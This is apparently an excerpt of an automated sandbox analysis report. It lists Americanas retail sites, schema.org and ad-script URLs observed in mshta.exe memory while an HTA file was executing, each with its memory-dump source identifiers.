https://protecaodemarcas.americanas.io/
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509932117.000000000BE33000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508874148.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12505060400.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573384336.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556795217.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12558604615.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492697957.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492287014.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578843377.000000000BE34000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ri.americanas.com/governanca-corporativa/estatuto-codigos-e-politicas
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495634133.000000000A9DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541572740.000000000A9F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577918644.000000000AB5B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515721910.00000000095EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574215733.00000000095EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511332893.000000000A9A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396762846.00000000069E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.00000000095E6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577404579.000000000A9C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506503755.000000000A9A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ri.americanas.io
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502000266.00000000095DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12512233499.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12566800059.00000000095DF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550466374.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480446240.000000000AD56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556081838.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396762846.00000000069E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508266831.000000000AD57000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579966803.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ri.lasa.com.br
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500012535.0000000002E94000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12557426752.00000000095BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573614739.00000000095BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511435902.0000000002E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509710023.00000000095BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12499023095.0000000002E8C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509384643.0000000002E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12558658695.00000000095BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://schema.org
Source: mshta.exe, 00000001.00000003.12567033771.0000000002ED1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541515073.000000000953E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496435383.0000000002ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12570297373.0000000002ED1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12558658695.00000000095A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508874148.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12505060400.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502389713.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573384336.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573614739.00000000095AB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556795217.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556953480.0000000002E8F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12558604615.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12499023095.0000000002E8C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492287014.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12566649661.0000000002E92000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502307562.0000000002E8C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12557426752.00000000095A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509710023.00000000095A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://securepubads.g.doubleclick.net/tag/js/gpt.js
Source: mshta.exe, 00000001.00000003.12567033771.0000000002ED1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496435383.0000000002ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12570297373.0000000002ED1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://securepubads.g.doubleclick.net/tag/js/gpt.jsS
Source: mshta.exe, 00000001.00000003.12487303820.0000000009B93000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487450474.0000000009B96000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487196877.0000000009B90000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487689897.0000000009B9A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487377551.0000000009B94000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487884189.0000000009B9F000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487723038.0000000009B9B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12536183808.0000000009BA3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487415470.0000000009B95000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487582544.0000000009B98000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487919513.0000000009BA0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487498726.0000000009B97000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487656610.0000000009B99000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12488018228.0000000009BA1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487846035.0000000009B9E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487237142.0000000009B91000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487783664.0000000009B9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://securepubads.g.doubleclick.net/tag/js/gpt.jsq7
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12512233499.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555009290.000000000BE18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508798468.000000000BE76000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550466374.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510371736.000000000AB3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556081838.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577843156.000000000AB4C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508682956.000000000BE70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://servicos.americanas.com.br/
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555009290.000000000BE18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396762846.00000000069E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478586213.000000000C119000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542146842.000000000BE13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492697957.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578758949.000000000BE18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476847039.000000000BDED000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://servicos.americanas.com.br/garantia-estendida
Source: mshta.exe, 00000001.00000003.12567033771.0000000002ED1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496435383.0000000002ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12570297373.0000000002ED1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://servicos.americanas.com.br/instalacao
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12554972564.0000000009724000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508002013.0000000009713000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.000000000970F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396762846.00000000069E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12575317065.0000000009728000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542078121.0000000009722000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AAE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000AAE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://servicos.americanas.com.br/instalacao-ar-condicionado-split
Source: mshta.exe, 00000001.00000003.12554972564.0000000009724000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508002013.0000000009713000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.000000000970F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12575317065.0000000009728000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542078121.0000000009722000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510409430.0000000009713000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://servicos.americanas.com.br/instalacao-ar-condicionado-splitO
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555009290.000000000BE18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580042948.000000000C11A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506644684.000000000BE61000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502799829.000000000BE56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396762846.00000000069E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478586213.000000000C119000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542146842.000000000BE13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492697957.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475890850.000000000BE62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://servicos.americanas.com.br/seguro-roubo-furto
Source: mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503863617.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574962923.000000000967A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://statics-americanas.b2w.io/
Source: mshta.exe, 00000001.00000003.12487303820.0000000009B93000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495634133.000000000A9DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492513851.000000000BEE2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487450474.0000000009B96000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556466118.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487196877.0000000009B90000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487689897.0000000009B9A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555009290.000000000BE18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487377551.0000000009B94000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503081399.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487884189.0000000009B9F000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12543252032.0000000009BA8000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487723038.0000000009B9B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487415470.0000000009B95000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577444815.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12535084740.0000000009BA4000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487582544.0000000009B98000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487919513.0000000009BA0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AA8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://statics-americanas.b2w.io/catalog-statics/acom/public/js/catalogo-template-americanas-mobile
Source: mshta.exe, 00000001.00000003.12555406957.000000000BFFD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495634133.000000000A9DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492513851.000000000BEE2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556466118.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12489344982.0000000009B23000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12489202013.0000000009B1E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579844318.000000000C005000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555009290.000000000BE18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503081399.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12557060559.000000000BFFD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12520851219.0000000009B29000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12489241096.0000000009B1F000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577444815.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579487451.000000000BEE2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12489406959.0000000009B25000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12489304785.0000000009B21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://statics-americanas.b2w.io/catalog-statics/acom/public/js/catalogo-ui-americanas-desktop-glob
Source: mshta.exe, 00000001.00000003.12487303820.0000000009B93000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487450474.0000000009B96000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487196877.0000000009B90000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487689897.0000000009B9A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555009290.000000000BE18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487377551.0000000009B94000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503081399.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487884189.0000000009B9F000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12543252032.0000000009BA8000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487723038.0000000009B9B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487415470.0000000009B95000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12535084740.0000000009BA4000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487582544.0000000009B98000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487919513.0000000009BA0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487498726.0000000009B97000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487656610.0000000009B99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 